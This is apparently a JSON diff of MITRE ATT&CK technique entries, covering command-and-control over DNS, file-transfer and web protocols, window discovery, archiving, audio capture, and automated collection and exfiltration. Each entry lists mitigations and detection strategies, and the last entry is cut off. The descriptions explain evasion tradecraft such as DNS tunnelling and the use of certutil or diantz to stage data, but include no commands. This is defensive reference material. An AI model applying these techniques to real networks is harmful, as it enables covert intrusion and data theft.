+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 16:27:31.768000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "DNS",
+                    "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)\n\nDNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e.\u202f[Protocol Tunneling](https://attack.mitre.org/techniques/T1572)). The commands may be embedded into different DNS records, for example, TXT or A records.(Citation: OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government) DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices.(Citation: DNS Beacons) Infrequent communication conceals the malicious DNS traffic with normal DNS traffic. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1071/004",
+                            "external_id": "T1071.004"
+                        },
+                        {
+                            "source_name": "Medium DnsTunneling",
+                            "description": "Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.",
+                            "url": "https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government",
+                            "description": "Kyle Wilhoit, Robert Falcone. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved July 21, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/"
+                        },
+                        {
+                            "source_name": "PAN DNS Tunneling",
+                            "description": "Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.",
+                            "url": "https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling"
+                        },
+                        {
+                            "source_name": "DNS Beacons",
+                            "description": "Vercara. (n.d.). Retrieved July 21, 2025.",
+                            "url": "https://vercara.digicert.com/resources/dns-beacons#page_top"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jan Petrov, Citi",
+                        "Chris Heald"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:27.877000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0400: Behavioral Detection of DNS Tunneling and Application Layer Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 16:16:25.763000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "File Transfer Protocols",
+                    "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1071/002",
+                            "external_id": "T1071.002"
+                        },
+                        {
+                            "source_name": "ESET Machete July 2019",
+                            "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-074A",
+                            "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:08.302000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0416: Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 16:13:46.151000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Web Protocols",
+                    "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1071/001",
+                            "external_id": "T1071.001"
+                        },
+                        {
+                            "source_name": "CrowdStrike Putter Panda",
+                            "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.",
+                            "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Brazking-Websockets",
+                            "description": "Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.",
+                            "url": "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "TruKno",
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:29.591000+00:00\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0027: Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:24.512000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Application Window Discovery",
+                    "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1010",
+                            "external_id": "T1010"
+                        },
+                        {
+                            "source_name": "ESET Grandoreiro April 2020",
+                            "description": "ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.",
+                            "url": "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/"
+                        },
+                        {
+                            "source_name": "Prevailion DarkWatchman 2021",
+                            "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.",
+                            "url": "https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2025-10-24 17:48:44.488000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0097: Detection of Application Window Enumeration via API or Scripting"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-20 20:53:45.725000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Archive Collected Data",
+                    "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1560",
+                            "external_id": "T1560"
+                        },
+                        {
+                            "source_name": "DOJ GRU Indictment Jul 2018",
+                            "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.",
+                            "url": "https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf"
+                        },
+                        {
+                            "source_name": "Wikipedia File Header Signatures",
+                            "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.",
+                            "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:48.023000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0526: Detect Archiving and Encryption of Collected Data (T1560)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-20 21:01:25.428000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Archive via Utility",
+                    "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. \n\nOn Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1560/001",
+                            "external_id": "T1560.001"
+                        },
+                        {
+                            "source_name": "WinRAR Homepage",
+                            "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.",
+                            "url": "https://www.rarlab.com/"
+                        },
+                        {
+                            "source_name": "WinZip Homepage",
+                            "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.",
+                            "url": "https://www.winzip.com/win/en/"
+                        },
+                        {
+                            "source_name": "7zip Homepage",
+                            "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.",
+                            "url": "https://www.7-zip.org/"
+                        },
+                        {
+                            "source_name": "diantz.exe_lolbas",
+                            "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Diantz/"
+                        },
+                        {
+                            "source_name": "Wikipedia File Header Signatures",
+                            "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.",
+                            "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mayan Arora aka Mayan Mohan",
+                        "Mark Wee"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2025-10-24 17:48:19.477000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0298: Detect Archiving via Utility (T1560.001)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:34.528000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Audio Capture",
+                    "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1123",
+                            "external_id": "T1123"
+                        },
+                        {
+                            "source_name": "ESET Attor Oct 2019",
+                            "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:24.702000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0221: Behavioral Detection Strategy for T1123 Audio Capture Across Windows, Linux, macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:27.985000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Automated Collection",
+                    "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. \n\nIn cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) \n\nThis functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1119",
+                            "external_id": "T1119"
+                        },
+                        {
+                            "source_name": "Mandiant UNC3944 SMS Phishing 2023",
+                            "description": "Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved January 2, 2024.",
+                            "url": "https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:35.995000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1029: Remote Data Storage",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0186: Automated File and API Collection Detection Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:29.458000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Automated Exfiltration",
+                    "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1020",
+                            "external_id": "T1020"
+                        },
+                        {
+                            "source_name": "ESET Gamaredon June 2020",
+                            "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.",
+                            "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ExtraHop"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2025-10-24 17:48:58.340000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
